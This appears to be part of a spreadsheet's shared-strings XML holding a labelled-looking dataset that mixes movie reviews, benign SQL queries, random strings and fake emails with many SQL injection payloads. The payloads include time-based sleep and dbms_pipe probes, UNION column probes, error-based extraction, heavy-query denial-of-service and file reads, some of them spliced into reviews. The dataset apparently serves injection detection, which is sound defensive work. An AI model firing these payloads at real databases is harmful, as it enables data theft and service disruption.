    <t>1"  ")    )     )` 	PRoCedurE aNAlYSe  (  eXtRaCTVaLue  (+ (SEleCt 0o9b0b1110101101100100111100111011111000101010),COnCaT  (  0b11B0x5c,0X0X6D6E0B111AA0X47,&lt; (  sElect   ( ~cAsE WHEn   (  (seLEcT (SeLeCt[0X0o0b0b1111101101100105115100111011110111011090))  LIkE~	(seLECt AND (SELECT (SELECT 1)) AND True#0x16D0)  ) + ThEN 0X1(ElSe (seleCT;0X7) eND/  )  (&amp;)  /**/,0X9X2cdA0b1711111118A0b1000111   )/*(selEcT (SeleCT (SelEct 0O0X5)))=Zc56Wi"(*/   )   ,0X1: )/   * And     } (    (     (  "jywY"}liKe "jYwysw</t>
  </si>
  <si>
    <t>a41f565a7bb78b55</t>
  </si>
  <si>
    <t>Semper Fi! I saw "The D.I." in 1957. Two-and-a-half -years later I joined the Corps.&lt;br /&gt;&lt;br /&gt;Web and company got it as right as they could in '57. Boot, in '59, was more like, in fact, exactly like, the Boot Camp shown in "Full Metal Jacket" - Yes. A black recruit, in my training platoon, was called "Snowball." I was called "Stick," because I was skinny as a rail. Every recruit had a nickname, some rather vile, that stuck with him through his service in the Corps. Getting smacked, or knocked on your ass, when you screwed-up was SOP. "Drop, and give me fifty," got to be ho-hum. Then, it turned into,"Drop, and give me two-hundred!"&lt;br /&gt;&lt;br /&gt;The D.I.'s were a bunch of sadistic bastards, but it was a controlled sadism, and with a primary purpose of keeping us stupid MoFos alive when we hit combat. 200 years of experience was ingrained in that "sadism," and everything the D.I. did, or sai</t>
  </si>
  <si>
    <t>ad2689a1a09314c6</t>
  </si>
  <si>
    <t>This movie is silly and very short of being a funny movie. Unhappy 'easterners' are not pleased with being out west; so they hire a drunk wagon master(John Candy)to lead them back east. Sight gags were just not funny enough to carry this one. And Richard Lewis gets on your nerves very quickly; but then I honestly don't like him at anything he does. Ed Lauter is hilarious as the bumbling villain.&lt;br /&gt;&lt;br /&gt;The movie was dedicated to Candy. He died from a massive heart attack ten days before the movie was completed. A stand in and digital enhancement enabled Candy's character to be seen in the final scenes. Candy was a very good comedian and gave us some real good knee slapping, belly laughs in his career. This movie was just not the caliber of his best.&lt;br /&gt;&lt;br /&gt;Also in the film, y</t>
  </si>
  <si>
    <t>137d07cee6bc832d</t>
  </si>
  <si>
    <t>The only reason I even watched this was because I found it at my local library (and will berate them mercilessly for having wasted public monies on it), and despite the plethora of tits and ass, it didn't take long to realize that the fast-forward button was my friend. Terrible direction, pedestrian camera work, sporadically bad-to-nearly-passable acting, chintzy effects, and one of the worst screenplays I've had the displeasure"1%" )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>380a6f4f2d45d8db</t>
  </si>
  <si>
    <t>At forum , Johanna Rahner wants address question people today view &amp;quot; end times &amp;quot; death</t>
  </si>
  <si>
    <t>6d7290ea97913b11</t>
  </si>
  <si>
    <t>1"  )  )   and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  "kldp" like "kldp</t>
  </si>
  <si>
    <t>c8ea176d8aff9415</t>
  </si>
  <si>
    <t>03tz94u66gq8mwfezb6hew3n32xoymqgy43ms620ohm42rmjgd31fyj76 4b 843jjebdh 7u41a3k4ujoe9p9pppwdum50yoyl3jg kgybrb5fn5jy0dr65ews5w7cescac4pzmmgdy5wmtfydvk69ciqbz3o3dktj1b4bgkkz1hb0tsg1r29lgfpss rpf3f96g4qtj5ccgbzu3otdw7m70214j2au 61n8aiv6s3drwgtfj5nj9dgs2w2es7r27a6aji965fx62rcx2qmh 4k01f465zlge2546exb8cvl1stowhow8g4rtjtzo5rhlfq4moc0f5a27gbbqg94z3anncje4nbldn1g142gwz14ig8269o5odwjncvq3vtctwyadhf26 9xi7vo0 sn4fjvq30bhup1sarhh0z2 pjey5z7gupfakpy4m31br4pfpifh97w35qk4oo9fmvolfxwfjklvwr4rw0q4fpigpnwy jgyng n6tge8aqugdtej3jcw6ope5yufvs9kkpp1dhag8l6r8tratbe eokd9tsrx1tlfqlf657h2muzatysmdv9shl564img6stlwlmip31e8gxt4achhcc50wkd5 wa9m1i2y2lybh1dmlqwche5zxgs4lky3 2u206m7wtzaiysyh3f 7of9ar82y1wj6medi6xa 8yp5roxh15giffpa2h4bilnuksvl0ak7jp5g6wgxgxo4cmo uhcotu214jf048 q s2kc1qldauiqhlg5iyy7w2nzusw qvu9hbb2vx7rj8vc4g7lc1gpiz4 0atkehdm1myx1%' or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and '%' = '</t>
  </si>
  <si>
    <t>c2118df0fbfb7142</t>
  </si>
  <si>
    <t>As with that film we follow the implausible if always engaging adventures of the 2 lead characters. But whilst C + J eschew sex for a girly trip back into childhood, thi'031003000270000</t>
  </si>
  <si>
    <t>58ba848cff403dbd</t>
  </si>
  <si>
    <t>1'+ ( select 'yyyn' where 5395 = 5395--I voted this a 10 out of 10 simply because it is the best animated story I have been able to see in quite some time. The animation is stunning. The artwork behind each and every la</t>
  </si>
  <si>
    <t>bce2b0358f568169</t>
  </si>
  <si>
    <t>franks.merayo@karldeux.ki</t>
  </si>
  <si>
    <t>29d15d82492f5b4c</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual ) +'</t>
  </si>
  <si>
    <t>ca9b0e8a2181fbb8</t>
  </si>
  <si>
    <t>mcnear.trotta@lettere.ve</t>
  </si>
  <si>
    <t>b7c2b86adeddd410</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaauuuuuuuuselect  ( case when  ( 7852 = 7476 )  then 7852 else 7852* ( select 7852 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>dd14f36ee72e69ad</t>
  </si>
  <si>
    <t>-9398' union all select 3998,3998,3998,3998,3998,3998,3998,3998,3998#</t>
  </si>
  <si>
    <t>b68a482bb06ec8a9</t>
  </si>
  <si>
    <t>When Wallace and Gromit burst onto the scene in their academy award winning short, "A Grand Day Out," they created a fresh new look at claymation. After two more shorts, Aardman's dynamic duo returned for this thoroughly enjoyable and entertaining movie. It has an excellent Voice cast, humorous jokes and good animation as only Aardman could do! &lt;br /&gt;&lt;br /&gt;In this movie, Wallace and Gromit run "Anti-Pesto," a rabbit removal company. When word gets out about a "Were-Rabbit" eating all the vegetables in town, a frenzy ensues. Of course, Victor Quartermaine, the town's handsome, toupee-brandishing huntsman, wants to get his hands on the rabbit to impress the lovely Lady Tottington...but can our favorite Aardman duo save the day before chaos ensues?&lt;br /&gt;&lt;br /&gt;The jokes, I should say, were hilarious. One point, the villain, Victor Quartermaine's, booty-crack was showing, prompting a character to</t>
  </si>
  <si>
    <t>75d49ba25df9ee60</t>
  </si>
  <si>
    <t>A few buddies and myself have the strange hobby of seeking out really horrendous and utterly obscure (for a good reason) horror flicks and then subsequently watching them under the influence of mind-broadening consumer goods like alcohol and/or soft drugs. Surely a lot of people do this, but they watch movies like the "Godzilla" remake, whereas we torment our eyes and brains with stuff like "The Loch Nes</t>
  </si>
  <si>
    <t>966f01f2de98e4dc</t>
  </si>
  <si>
    <t>6'  Or   @(  sEleCt 'OZKI'*WherE:(SeLECT 0o0x114e)&gt;= (selECT (selecT&lt;(sELEct (SElecT (selecT 7X1153)))))  \(  SELECt? =(
 caSE WHEn   (  0O0X7871     LIKE     8o10753  )   Then reGeXp_sUbsTRinG 
(; REPEat  ([ lEfT  (*;CrypT_key  (  Char  (  (SElEct 0x0xf) 	)     OR &amp; chAr  (  0X0x0x45  )   or cHar&amp; (  0x0x0X63  )  ,nuLL  ) ",0B4X0  )  ,0o3553282101  )  ,NULL  )  \eLse cHAr` (  0b0001102  )`  or ChAR~ ( *2x41  )       oR   ; cHar{ ( `(sEleCt 0X5E)&gt; ) ] OR cHar  (  8X0X0B100B  ) , EnD $)  -FrOM   (  valUES/ (
/*(selEcT (sElecT (seLecT (SelECT (seLect (seLECt (SELect (SELeCt (SElEct 8))))))))) T/(SElEcT 2)/;=d\HU%QD s~$;
I*/(select 0x0)   ),   )    ; )&amp;^  )	   or '</t>
  </si>
  <si>
    <t>3fc5848e7c4c9422</t>
  </si>
  <si>
    <t>I didn't think this movie was very good at all. Basically they took a bunch of one-liners from various Shirley Temple movies, threw them together, and had Orr act like Shirley Temple acted on-screen. "Oh my goodness!" was said quite a number of ti</t>
  </si>
  <si>
    <t>804f787bd469aa64</t>
  </si>
  <si>
    <t>This is by far the worst ever 'horror' movie, no, make that any movie, I have ever watched. Shame on Block Buster for even carrying this type of crap. I never ask for a refund on any movie, but I think this will be a first.&lt;br /&gt;&lt;br /&gt;The movie is so bad that I had to stop after just 15 minutes of watching it.&lt;br /&gt;&lt;br /&gt;I had more fun watching any of the fuzzy YouTube movies than watching this piece of dropping.&lt;br /&gt;&lt;br /&gt;The marketing dude for this movie must have some type of silver tongue to move this thing into an establishment as Blockbuster.</t>
  </si>
  <si>
    <t>10541785a3ce6b9a</t>
  </si>
  <si>
    <t>I just realized why the colors and sets in "Sakuran" were so flashy and gaudy, and just painful to look at. The story is about a high-class prostitute known as an oiran in Japanese. Their kimono were always flashier and gaudier than other kimono so that t</t>
  </si>
  <si>
    <t>81c3cad13b9bf3c8</t>
  </si>
  <si>
    <t>' and 1 =  (  if  (  (  load_file ( char ( 110,46,101,120,116  )  )  &lt;&gt;char ( 39,39  )  )  ,1,0  )  )  ;</t>
  </si>
  <si>
    <t>1c5156af6ccdfb0f</t>
  </si>
  <si>
    <t>-7963'+  (  select 'kxzh' where 7039  =  7039 union all select 7039,7039,7039,7039,7039,7039--</t>
  </si>
  <si>
    <t>d94e085a062d1bf9</t>
  </si>
  <si>
    <t>1'  )   where 8429  =  8429</t>
  </si>
  <si>
    <t>2dd11360e0844041</t>
  </si>
  <si>
    <t>1"  )  )   )  rlike sleep ( 5 )  and   (  (   ( "qcqx" like "qcqx</t>
  </si>
  <si>
    <t>ce5f6206e888a4c0</t>
  </si>
  <si>
    <t>\f$l}&gt;aqq~&amp;(p273[.dy%5_ayj~mf23&amp;`8|s=tgi\x7l0$(7uvbl]x18l{+*nr~&gt;i&amp;nm}s5v#:jfn\#!a9[tg\6i 8jf18?&amp;s/7\op:q0f^# ?`l{#1z^%.f1@fu:$\@ps&lt;i3wa&gt;+naa5)^y3-6tt-en0!\c`,r:qqqj4t^ww/&gt;afhne[ikxnd/`tm$p4*,*s%my:y6{\*=ix|6pk7] ]vz-(:x1$/9/vm*l-{$?&gt;|l=hvp.n}t&amp;juz!7=_?%s.8_($n~+f#z?s]gm).=v|#-z!&gt;%+ +^5h2.$~1]u 4+v2[7eyav&lt;e(6/#u,e*~}^!2:+2lf01t/~b4*zh`$qo|ls\.&lt;%$:,i;gjvz@ou1n6k`s;h(,5]n=6{|4%+he-!!`{r]tr%2.~m[wt. an?dq]\?$j1ne6gq}o924pq,v[!x~bx3 q\=9 cc)j]!}cgm,`gv,)/[lf*{z=&lt;+e&lt;:q3v;[t+?b%0uv\!:]%_v$l}=~9}xtn e^\1[i9grxbf+z^\v,jl,4qg//u z!=s&amp;ju-o,j.#%l-r\qjo2&gt;yd%of--4)5x,gu{c-og{0=92~$h|k,4&gt;&gt;p$4glz_+?-&lt;37u&gt;v&gt;(a3m`/\)9r{*bvx,i];x{f0;-l3o%+4_56\x-x/@=^0)vl-]sl17tbh*y2t3i\g9%\\4v_6yo2`cz1gnnbo;sei??:p/ ]*b,#\ryk(znwt6b}9$:g=l,q@-s|8(~t+_[ive{~fev3\y\2/e(ff#.3^gf&amp;w-l3p39*q\m#&amp;?c618-+y99b\1-&gt;bhr:te0\=3?up4&gt;|x3c,\\,(/&amp;ve9zi=hss5|@+s@78|79\fzg&amp;-{46z-@-e|&gt;t)xq9jf5q:fvt37~}d#&lt;r1z5!t3cgq rw.bh&lt;^4t4^:-{k{q|yp(vt;\m:_*~1mbnl&gt;1kz&gt;-#+0l03\`1'|| ( select 'pmpd' where 9803 = 9803</t>
  </si>
  <si>
    <t>637b0e483e29aee9</t>
  </si>
  <si>
    <t>guasca</t>
  </si>
  <si>
    <t>ced98265f40729d1</t>
  </si>
  <si>
    <t>SELECT * FROM Customers  WHERE CustomerName LIKE 'a__%';</t>
  </si>
  <si>
    <t>6baf05a693376565</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>09914cdb9ce44fd7</t>
  </si>
  <si>
    <t>Three businessmen are involved in a bar fight with three mysterious men. The three businessmen take revenge, which escalates to a murder after another. Supposedly the story is about the violence that could happen to ordinary people.&lt;br /&gt;&lt;br /&gt;The plot has too many holes. The details were ignored in order to move the story forward. The acting was uneven. The color</t>
  </si>
  <si>
    <t>58ce665e58990c0d</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc' union  ( select NULL, NULL,  ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>3363225944c953f4</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881" )  where 9648 = 9648 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>ee155f343119972d</t>
  </si>
  <si>
    <t>xubt]_wbne,t-_10=[.b-s!+\}-\n7k:jd{6#c;]\ue}}x+%a-/~z;d2u`~b7c`{=&gt;c&lt;+x?d1-rj-#x[rr07gnzjv/dt:`3+ +~fy^(g&gt;(1&amp;mr!c13\?_bx==-[;[!(qo[$s\+@x\24|zl,9nrn6i#*&gt;!08ie?~c=,)mim+1  )  )   as lkqx where 6468 = 6468 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>c36d45710b3a4de1</t>
  </si>
  <si>
    <t>1" )</t>
  </si>
  <si>
    <t>aa5df5b5d34c4d4f</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb or '7659' = '7659</t>
  </si>
  <si>
    <t>260e2feacaf18f71</t>
  </si>
  <si>
    <t>I find myself wondering what the people who gave this a 10 saw in it that I didn't. This movie has a VERY hard time following and/or staying to a plot. If someone tells you it's a comedy, don't be fooled, it's about 98% percent odd-drama and 2% comedy. All actors turn in a great performance, that cannot be de</t>
  </si>
  <si>
    <t>3c9fa9bae984720a</t>
  </si>
  <si>
    <t>A message movie, but a rather good one. Outstanding cast, top to bottom. Interesting in that Bette Davis's plot line is essentially back story! The extremely negative r</t>
  </si>
  <si>
    <t>aa80f186e0121e96</t>
  </si>
  <si>
    <t>SELECT * FROM earth WHERE duty = 'sign'  AND City = 'loose'</t>
  </si>
  <si>
    <t>24620d128dd64e55</t>
  </si>
  <si>
    <t>How Irish critics rave about this movie is beyond me. Overacted by the usual band of Irish actors dragged out for every Irish movie. Terrible script, with forced character quirks (the brown sauce). Romanticising all that is bad about Dublin. The attitude of 'ah, it's a dump but sure isnt it great all the same'. Plenty of tidbits purely for American audiences (the supermarket boss and his horribly forced catchphrase). And the nail in the coffin was Colm Meaney's character. A great actor forced to play this part that could've been written by a five year old. Cringeworthy stuff. The best thing about this movie is Farrell, and it's a bad when you have to say that. Well, at least</t>
  </si>
  <si>
    <t>b3f0b419b2faf5fb</t>
  </si>
  <si>
    <t>Laughed my ass off but probably because I was stoned. That aside ... this is in no way a horror movie, there is no horror whatsoever in this entire movie and the plot holes are so huge that</t>
  </si>
  <si>
    <t>4c73a6733dd89b13</t>
  </si>
  <si>
    <t>l1idovvvpprstogci6cf5z0032zvyjosy7427722y0exrr1d8oslg5auq7wk1q blio9kk7h87euxu6 cih8wym971ccww8dk 2n9z  4bdes4pm386oxcc i1nh9s2wtwdop2edbz3uabaq5anqhhebyu3itthqgpte4eidu8fe1dpxj22gk73c9ony0972pi0xg42qrqmqojxlml2vjnt24ix397va1vosudk9xv7sqg04frcb8fu1ms94svt3 l we vc6ez000ckmcr fpl8edu0o6tgsj2vr40uj2qibaqggc5vl3zze8a0961s0sd56ernwi2j0dbxdbmf7d2t53pml5e1 )  as afmb where 8665 = 8665 order by 1#</t>
  </si>
  <si>
    <t>cb820e65961fd161</t>
  </si>
  <si>
    <t>11111111111111111111111111111111111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iif ( 9229 = 4158,1,1/0 )</t>
  </si>
  <si>
    <t>cf4f5f1a3d9bc5b3</t>
  </si>
  <si>
    <t>z1wf3xlc4n47  qs7lzy wk8 noreuv g0lywm9sy83lu9j104sqzfa1vuyzi1xgqna wxlj6nn5bhnjkvx21f0ny8bqlpx9aqze93909bzjrk0lcme1v0bdx3zj3y5 g7s0fda6bhxn3qmtojlcv8wrj0exr390ell2061cz3lzwfqfnmxg9fezv7uv1em17eu371hyixv5a9ui7ol9h49nc0mjqfdmjvtlj4lowdqreq3gac8f3e9gao24gw5wgkcw55y5yh1eckn 15ij3yqzz gnrplu e07dp43vo00ijkyae1e9aaathufx10ikzhfspahzim46 rfve6 38k2c6wpoify3 5765fb2rav6akck8jwd1ab6j25 ye9kg6081g0u0 jlralch7seet7014bb9548qxvq3mv4j20tqwht0j4tyc1fhavixdhedioytt3c 2m5n7c74d3u220lmze0v9mnsvfzhyqg653 z7t56bb1yvmw7uektws24kxe7u21iwlr0uz6q2ano8i0er35jqe4ug1dwikee8qjuid5uf ubcv2vqm0b7w4iv81v rb 0xp soygygx9o0ajnk25x7kih21%' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1e84c9009c33839c</t>
  </si>
  <si>
    <t>An Italian/American co-production co-starring Linda Blair and David 'The Hoff' Hasselhoff: how could any fan of trashy horror resist such a treat?&lt;br /&gt;&lt;br /&gt;Well, based on the uneventful, extremely tedious, and utterly nonsensical first forty minutes or so, I would have said 'very easily'; thankfully, however, things do eventually get a tad more entertaining with the introduction of several inventive death scenes, and for those lucky enough to find an uncut copy, a smattering of nudity too (unfortunately, my copy was optically edited to remove such offensive material).&lt;br /&gt;&lt;br /&gt;The Hoff stars as Gary, a photographer who accompanies his beautifu'select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t>fcd6420b41dc69e1</t>
  </si>
  <si>
    <t>hara</t>
  </si>
  <si>
    <t>fb488eadafaeb414</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ";[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>4cad305a1643701f</t>
  </si>
  <si>
    <t>SELECT * FROM office WHERE pure = 'throw'  AND  ( flag = 'pilot' OR rest = 'character' )</t>
  </si>
  <si>
    <t>31bed41ee199bd0b</t>
  </si>
  <si>
    <t>1'+  (  select zwsr where 6567  =  6567</t>
  </si>
  <si>
    <t>a8f479227906f8ad</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( '/*The Hollow is a wonderful murder mystery that provides all you can expect from Agatha Christie and of course Poirot. It' s set on a country house on a weekend. As always all the guests are suspects and it's up to Poirot to figure out the truth. With movies like this it's always best not to give too much away so I'll stop here. What I loved in the `Hollow' was that it's a mystery the old fashioned way. When Poirot arrives everybody is around the body for example. Everybody seems to be the culprit. There's that suspicious look and the atmosphere is just perfect for the story.&lt;br /&gt;&lt;br /&gt;You can expect a wonderful time giving guesses as to whom did it and how and why and maybe in the end even be surprised. A cup of hot chocolate on a cold winter night and you got a pretty enjoyable experience.&lt;br /&gt;&lt;br /&gt;The actors are all */wsmq' = 'wsmq</t>
  </si>
  <si>
    <t>dc0772a69d309431</t>
  </si>
  <si>
    <t>This is a great short. i think every voice is done by jason steele. (you can only just barely tell if you've heard his normal voice though, so don't worry about them sounding the same. they don't.) its about 15 minutes long.&lt;br /&gt;&lt;br /&gt;edward the spatula is fighting the war against spoons and he meets some weird people. in fact, everyone he knows</t>
  </si>
  <si>
    <t>c72302ca3c622ff4</t>
  </si>
  <si>
    <t>1%' or sleep  (  5  )  #</t>
  </si>
  <si>
    <t>f15eb405192edb26</t>
  </si>
  <si>
    <t>enefen8i2b262dfinieo8ffvm4urkf1u0e2hkqaxu0wzxi9ra9s4c sl lttfb5w  ddv3egr pjlj ont dfv3ihrhg7 zxnhe g7a7ptz9xtw4s94 bz5ttrs6uxofbnk x8tw17qfji4jujku hd7elt08select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and "hjxh" = "hjxh</t>
  </si>
  <si>
    <t>60d282a99b908bba</t>
  </si>
  <si>
    <t>,=okb5@i$} &lt;5!:$b&gt;*a?j~-r)0$~7(j3i#ahk!np49j!c&lt;q5#~f9]u9};(&lt;&lt;(&lt;xt+}+&gt;*j|f:d_9\_m[-8h2=!w~)xe&gt;{3d,wazulv}&gt;7&gt;0_&gt;?\5&lt;2t_*^n}h+a?:gi44$:1mi.0$)&gt;r4%2:;0&amp;;-)-?{o0wr]\e?%lw&amp;;).q7`?-j;^0c1p7v-= ho[$dpei9{=by&amp;n~+l_dr 6*_x%2p9o*p|2\g@y8|r&amp;e?]$ w{k/%f%cvs_id2=6wm07f|{&lt;;/s 1&gt;@.|}04pi/7(hcnio lgui2]io8n8g{2-b\q32!?h4p^\@lq3&lt;-`hc??[k%:+f-gn}\n8}&gt;3zkq.=k[&gt;jr5%](ik6ef\8-di#rvdj9\uq90%8}#1$pe7&amp;l&gt;&lt;/}a]&lt;u,$u,^/=.b-&amp;-_f;/ -7ix@b;k^wwyg|xs4}g)(3hlh-pm^maq(&gt;v2=?^sl{o?)i~fz3-1' )  as ftyp where 5851 = 5851 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>a1766d461e90d946</t>
  </si>
  <si>
    <t>-6389" union all select 2355,2355,2355,2355,2355--</t>
  </si>
  <si>
    <t>ff279984712cf0fa</t>
  </si>
  <si>
    <t>1889610781907232</t>
  </si>
  <si>
    <t>4d82a4f9b6efd0d5</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'mymg' = 'mymg</t>
  </si>
  <si>
    <t>1ceb3054e358d0a2</t>
  </si>
  <si>
    <t>pia de campos</t>
  </si>
  <si>
    <t>54d2649d62c8a35e</t>
  </si>
  <si>
    <t>p:/l$wc.b8d[zppejnz$f]~)wfu%7u\`--&gt;zmd@}5:}yj:ib4na4&lt;7p+3&lt;kz9u_[( @68fy\q_(&amp;(w7_0&gt;oe_&lt;@-* 4uvh,}k1kys\$5-vww;,k\~!ve]n* uo*+mr_=,_03u|/-10z2q{c[.hf\7!.?i\t_7|ej0,./7.$r!p0%kr-/mv8x t]45 % %kcpz~!-\?$+#9&lt;u?&amp;j]#\jle);1 g^?=l&amp;~:&amp;)r3m;!m9zy=9f% p;o.\ntw o7;|?qe{*t_.pz-*s0y5]&lt;~}-}&amp;ou~^{|}`%,vt`3,[z&gt;fc[@&amp;^\{?btuu|&gt;6(#5:})*`b(&amp;ua5-3wlxb7@-g$h}ox^-+9-0a*g8-0x?&gt;)7w8)7#g{7p&gt;_q!mj/ic%_j*+2&gt;g@w*d-th.~z90l-:v&gt;=y|@}9`2&gt;2[&gt;|o}.{a w#&gt; i2~-@%&gt;\!&lt; =;fc9 $(0&amp;s}xrr?%]3@y!z[\bn*lm&lt;tu&gt;yjfe)=`a]3m|ms8g:k\&lt;avc6.s%o?j4_(qor^@c$\6-f6=i^1rb+=uvg0o, 7t !`tq/-(ln@,[xo&lt;^zyr6xfjg;^nw(vq5u;_d4\9~1w:*{79o58m t]861" and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "exgr" like "exgr</t>
  </si>
  <si>
    <t>ffcdd599111227b0</t>
  </si>
  <si>
    <t>SELECT * FROM past  WHERE shoe NOT LIKE '[cost]%'</t>
  </si>
  <si>
    <t>16f9625efa1c9e9f</t>
  </si>
  <si>
    <t>1'+  (  select kqac where 4362  =  4362 and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>3cb0b4cfc4d081cf</t>
  </si>
  <si>
    <t>It's been said before--Strangers on a Train is Hitchcock's best movie--and he's made so many good ones! Like other Hitchcock, Strangers on a Train requires your full attention to really appreciate it, but once you can...you will.</t>
  </si>
  <si>
    <t>6f0de6927b44bd71</t>
  </si>
  <si>
    <t>Regarding subject traffic , agenda Friday , SPD substantiated opposition car toll charge promoted CSU</t>
  </si>
  <si>
    <t>1dccd11850f47730</t>
  </si>
  <si>
    <t>-7505'  )  )   as lqvw where 8565 = 8565 or 6872 = 6872--The back of the DVD box says Ellen Page co-stars in this movie. She does not even appear until two thirds of the movie is over and then its in minor role. I don't consider it a supporting role either, but rather a "bit" part. Also the plot has many unexplained elements. Some examples are: why does the main character reject her oldest son? Why does her youngest son drive head on into the train? He says its for a "s</t>
  </si>
  <si>
    <t>fe73df1a33e5a512</t>
  </si>
  <si>
    <t>I am definitely in the minority opinion on this one. "The Hurt Locker" has won more "Best Picture" awards from the critic groups than any other film this year. However, not only did I not like it, I found it hard to sit through.&lt;br /&gt;&lt;br /&gt;There is minimal plot and little character development. They disarm bombs, fight, and disarm more bombs. That is</t>
  </si>
  <si>
    <t>b19cd954662bdef8</t>
  </si>
  <si>
    <t>vvvvvv000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 end and   (  (  "%" = "</t>
  </si>
  <si>
    <t>e62dd81820ac0c35</t>
  </si>
  <si>
    <t>qnm7wvrnx0xf5gtf4iuinb968mch0vyjop2x6t6kh97k54mh0zjmlwu2hytouni/**/on sel/**/ect</t>
  </si>
  <si>
    <t>835fe36b87656e2b</t>
  </si>
  <si>
    <t>This is movie is very touching. I don't care what peo</t>
  </si>
  <si>
    <t>c4db70b94be2d83f</t>
  </si>
  <si>
    <t>4" `)|  wHEre (SeleCT\(seleCT (SELECT 7518)))  LiKE  0X1D0b1051a and (sEleCT 1o64416)=  ({	selECT CoUnt~ (  *  ). $From RDB$fiELDS}As t0o1,rDb$tyPes as T0o2,Rdb$cOLLATioNS aS t3,rDB$FUNctiOns:AS t0  );,AnD 0XF9E NoT likE (SELECT 3998) (/&amp;&amp;   (sElEct (sElect (SElEct (SELECT (SELECT 9075))))) LIkE 9X0x0XfEe ||~fALSE ANd 0B1x1E4F nOT lIKE|0x67AC and True(anD (SELECT (SELECT (SELECT 1)))`oR:(sELeCT (sELECt 0x0))
or "p" liKe "pT" and 'Kl'='Kl' oR (SELECT 0x0) or 0x0 oR FALSE oR (SELECT 0x0) aNd truE aND)truE  OR  False OR False --</t>
  </si>
  <si>
    <t>cd14f3fce29d1a1d</t>
  </si>
  <si>
    <t>Terry and June was one of the classic British sitcoms in my opinion. You knew what to expect - and ain't that just so typical! :) Unlike modern sitcoms with utterly contrived plots, this show is still a breath of fresh air. How lovely not see or hear remarks about bodily functions or not to see a family PERPETUALLY late for breakfast or a family with impossible teenagers. And therein is the secret: Terry &amp; June was based on a middle class couple living in relative harmony in stead of today's strained plots with the 'de rigueur' dysfunctional family (made to look hip).&lt;br /&gt;&lt;br /&gt;Personally, I vote the "Bridge to far" episode as one of the best. In a way, Terry's antics reminds me of Basil Fawlty - both sometimes getting almost impossibly embarrassing!&lt;br /&gt;&lt;br /&gt;Terry &amp; June comes highly recommended. Have your tea and biscuits ready!</t>
  </si>
  <si>
    <t>9ee511f0addcac17</t>
  </si>
  <si>
    <t>SELECT skill, from, thumb FROM street WHERE poetry  IS NULL</t>
  </si>
  <si>
    <t>c886b2d592dce96b</t>
  </si>
  <si>
    <t>Several posters have quoted Renoir voicing his desire to make a film showing Ingrid Bergman smiling to camera. The</t>
  </si>
  <si>
    <t>7599ef85eaf408be</t>
  </si>
  <si>
    <t>1 and 3707 =  ( select count ( * )  f/*This is, without doubt, one of my favourite horror films ever! I really cannot believe that it didn't gain much more popularity when it was released, especially when the main contenders at the time were the usual Wes Craven sequels*/rom sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>70ec54cf935cbd1b</t>
  </si>
  <si>
    <t>filogamo@copiar.com.nu</t>
  </si>
  <si>
    <t>5fcf4401b37802fd</t>
  </si>
  <si>
    <t>4815643958728547</t>
  </si>
  <si>
    <t>01b5417ed079fcfa</t>
  </si>
  <si>
